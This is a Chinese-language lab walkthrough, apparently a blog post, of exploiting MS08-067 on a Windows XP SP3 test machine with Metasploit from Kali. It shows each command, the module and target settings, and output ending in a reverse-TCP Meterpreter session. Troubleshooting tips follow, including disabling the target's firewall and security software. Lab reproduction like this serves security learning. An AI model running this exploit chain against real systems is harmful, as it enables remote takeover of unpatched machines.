一、复现过程

       靶机             Windows XP Service Pack 3         IP地址:192.168.244.133
     攻击机                         Kali

IP地址:192.168.244.138

1、执行命令:msfconsole

┌──(root㉿kali)-[~/桌面]
└─# msfconsole# cowsay++____________
< metasploit >------------\   ,__,\  (oo)____(__)    )\||--|| *=[ metasploit v6.1.27-dev                          ]
+ -- --=[ 2196 exploits - 1162 auxiliary - 400 post       ]
+ -- --=[ 596 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 9 evasion                                       ]Metasploit tip: Save the current environment with the
save command, future console restarts will use this
environment again

2、执行命令:search ms08-067

msf6 > search ms08-067Matching Modules
================#  Name                                 Disclosure Date  Rank   Check  Description-  ----                                 ---------------  ----   -----  -----------0  exploit/windows/smb/ms08_067_netapi  2008-10-28       great  Yes    MS08-067 Microsoft Server Service Relative Path Stack CorruptionInteract with a module by name or index. For example info 0, use 0 or use exploit/windows/smb/ms08_067_netapi

3、执行命令:use 0 或 use exploit/windows/smb/ms08_067_netapi

msf6 > use 0
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp

4、执行命令:show options

msf6 exploit(windows/smb/ms08_067_netapi) > show optionsModule options (exploit/windows/smb/ms08_067_netapi):Name     Current Setting  Required  Description----     ---------------  --------  -----------RHOSTS                    yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-MetasploitRPORT    445              yes       The SMB service port (TCP)SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)Payload options (windows/meterpreter/reverse_tcp):Name      Current Setting  Required  Description----      ---------------  --------  -----------EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)LHOST     192.168.244.138  yes       The listen address (an interface may be specified)LPORT     4444             yes       The listen portExploit target:Id  Name--  ----0   Automatic Targeting

5、执行命令:show targets

msf6 exploit(windows/smb/ms08_067_netapi) > show targetsExploit targets:Id  Name--  ----32  Windows XP SP3 Arabic (NX)33  Windows XP SP3 Chinese - Traditional / Taiwan (NX)34  Windows XP SP3 Chinese - Simplified (NX)35  Windows XP SP3 Chinese - Traditional (NX)36  Windows XP SP3 Czech (NX)

6、执行命令:set  target  34 和 set  rhost  192.168.244.138

msf6 exploit(windows/smb/ms08_067_netapi) > set target 34
target => 34

7、执行命令:set  rhost 192.168.244.133

msf6 exploit(windows/smb/ms08_067_netapi) > set rhost 192.168.244.133
rhost => 192.168.244.133

8、执行命令:show options

msf6 exploit(windows/smb/ms08_067_netapi) > show optionsModule options (exploit/windows/smb/ms08_067_netapi):Name     Current Setting  Required  Description----     ---------------  --------  -----------RHOSTS   192.168.244.133  yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-MetasploitRPORT    445              yes       The SMB service port (TCP)SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)Payload options (windows/meterpreter/reverse_tcp):Name      Current Setting  Required  Description----      ---------------  --------  -----------EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)LHOST     192.168.244.138  yes       The listen address (an interface may be specified)LPORT     4444             yes       The listen portExploit target:Id  Name--  ----34  Windows XP SP3 Chinese - Simplified (NX)

9、执行命令:exploit

msf6 exploit(windows/smb/ms08_067_netapi) > exploit[*] Started reverse TCP handler on 192.168.244.138:4444
[*] 192.168.244.133:445 - Attempting to trigger the vulnerability...
[*] Sending stage (175174 bytes) to 192.168.244.133
[*] Meterpreter session 1 opened (192.168.244.138:4444 -> 192.168.244.133:1061 ) at 2022-10-06 20:36:00 +0800

8、执行命令:ipconfig

meterpreter > ifconfigInterface  1
============
Name         : MS TCP Loopback interface
Hardware MAC : 00:00:00:00:00:00
MTU          : 1520
IPv4 Address : 127.0.0.1Interface  2
============
Name         : AMD PCNET Family PCI Ethernet Adapter -
Hardware MAC : 00:0c:29:31:24:dc
MTU          : 1500
IPv4 Address : 192.168.244.133
IPv4 Netmask : 255.255.255.0

二、遇到的问题

msf6 exploit(window/amb/nsto_067_notapi) > exploit
[*] Started reverse TCP handler on 192.168.43.75:135
[-] 192.168.244.133:445 - Exploit failed [unreachable]: Rex::ConnectionTimeout The connection with (192.168.244.133:445) timed out.
[*] Exploit completed, but no session was created.
msf6 exploit(windows/smb/ms08_067_netapi) > exploit
[*] Started reverse TCP handler on 192.168.244.138:4444
[-] 192.168.244.144:445 - Exploit failed [unreachable]: Rex:: HostUnreachable The host (192.168.244.144:445) was unreachable.
[*] Exploit completed, but no session was created.

1、执行exploit命令后提示:Exploit failed [unreachable]: Rex:: HostUnreachable The host  was unreachable. 或 Exploit failed [unreachable]: Rex::ConnectionTimeout The connection with (192.168.244.133:445) timed out.

出现这两种问题的原因可能有以下三个:

(1)靶机的防火墙或杀毒未关或如火绒这类的安全软件未退出。

当已经确定防火墙关闭时,要去检查安全软件是否退出,因为火绒会进行拦截。

(2)靶机和攻击机不在一个网段内,不能互相ping通。

(3)靶机的端口没有打开,即RPORT中所对应的端口没有打开。

注:优先考虑前两个原因,当前两个原因检查之后确定无误时,再去检查端口的状态。

2、执行exploit命令后提示:Exploit completed, but no session was created.

出现该问题的原因可能有以下两个:

(1)靶机版本不支持

下载Windows XP SP3 English。

(2)未指定靶机的版本号,在执行show targets命令后,找到与自己靶机相对应版本的版本号,如Windows XP SP3 Chinese - Simplified (NX)的版本号为34,执行set target 34 为自己的靶机指定版本号。

ms08-067漏洞的复现及所遇到的问题分析相关推荐

  1. tomcat ajp协议安全限制绕过漏洞_Apache Tomcat文件包含漏洞(CVE20201938)复现

    一.漏洞背景2020年02月20日,国家信息安全漏洞共享平台(CNVD)发布了关于Apache Tomcat文件包含漏洞(CVE-2020-1938/CNVD-2020-10487)的安全公告.Tom ...

  2. nginx解析漏洞简单复现及修复

    Nginx简介 Nginx是一款轻量级的web服务器/反向代理服务器及电子邮件(IMAP/POP3)代理服务器,其特点是占内存小.并发能力强:国内使用Nginx的有百度.京东.新浪.网易.腾讯.淘宝等 ...

  3. Apache Struts2远程代码执行漏洞(S2-019)复现

    动态方法调用是一种已知会施加可 Apache Struts2远程代码执行漏洞(S2-019)复现能的安全漏洞的机制,但到目前为止,它默认启用,警告用户应尽可能将其关闭. S2-019的poc,是deb ...

  4. MessageSolution 邮件归档系统EEA 信息泄露漏洞 CNVD-2021-10543复现

    MessageSolution 邮件归档系统EEA 信息泄露漏洞 CNVD-2021-10543复现 一.简介 MessageSolution企业邮件归档管理系统 EEA是北京易讯思达科技开发有限公司 ...

  5. Heartbleed漏洞的复现与利用

    一.      1.Heartbleed漏洞是什么 Openssl在处理心跳包的时候检测漏洞,没有检测payload与实际的数据字段是否匹配,造成最大64KB的内存泄漏 2.基本背景和影响 OpenS ...

  6. ThinkPHP漏洞总结复现

    ThinkPHP漏洞总结 简介 版本 Thinkphp 2.x 任意代码执行漏洞 漏洞原理 复现过程 修复意见 Thinkphp5-5.0.22/5.1.29远程执行代码漏洞 漏洞原理 影响范围 复现 ...

  7. Ubuntu内核提权(CVE-2017-16995)漏洞的复现脏牛漏洞

    Ubuntu内核提权漏洞的复现 这里先介绍一下漏洞,Ubuntu是一个以桌面应用为主的开源GNU/Linux操作系统,基于Debian GNU/Linux .近期有白帽子爆出 ubuntu 的最新版本 ...

  8. 方程式 Eternalblue 漏洞利用复现

    漏洞原理 详细的漏洞原理参照文章: http://www.91ri.org/16946.html 懒得点连接的大人们可以看这里: 首先SrvOs2FeaListToNt首先调用SrvOs2FeaLis ...

  9. weblogic 文件打开数_WebLogic任意文件上传漏洞(CVE20192618)复现

    1.漏洞介绍 CVE-2019-2618漏洞主要是利用了WebLogic组件中的DeploymentService接口,该接口支持向服务器上传任意文件.攻击者突破了OAM(Oracle Access ...

最新文章

  1. SAP MM初阶之ME12里为啥只能维护少量条件类型的价格?
  2. 【system generator】基于system generator的根号运算系统实现
  3. Java8:Lambda表达式增强版Comparator和排序
  4. leetcode18. 四数之和
  5. 飞鸽传书2012绿色版下载
  6. Flask框架——路由和视图
  7. linux学习查看系统资源和磁盘分区
  8. java中输入的程序_Java中输入的用法
  9. 中国的脑部研究--脑网络组图谱
  10. 删除单链表中指针q指向的结点
  11. 用R进行meta分析(metafor包)
  12. 详解Java 堆排序
  13. 数组分为两部分,使得其和相差最小
  14. 选手投票html,选手投票网页制作
  15. python如何编写爬虫程序_python编写网络爬虫程序
  16. 作业中关于H5中动画的实现——animation
  17. 字节跳动双11电商直播技术大揭秘
  18. 苹果电脑如何使用Siri语音助手!
  19. 反射 Reflect Class 基础 API MD
  20. Android Jetpack annotation

热门文章

  1. 盐城北大青鸟每日小报
  2. Excel(VBA)自定义右键单击菜单以启动宏(示例代码)
  3. iOS swift5 字典转模型(二)
  4. android.mk中几个常见配置
  5. 在浏览器中直接打开PDF
  6. html伪类元素加图片,HTML中常见伪类和伪元素的区别
  7. html怎么比较时间,比较时间大小的方法
  8. 如何旋转苯环化学结构
  9. vijos 隐形的翅膀
  10. npm 镜像淘宝替换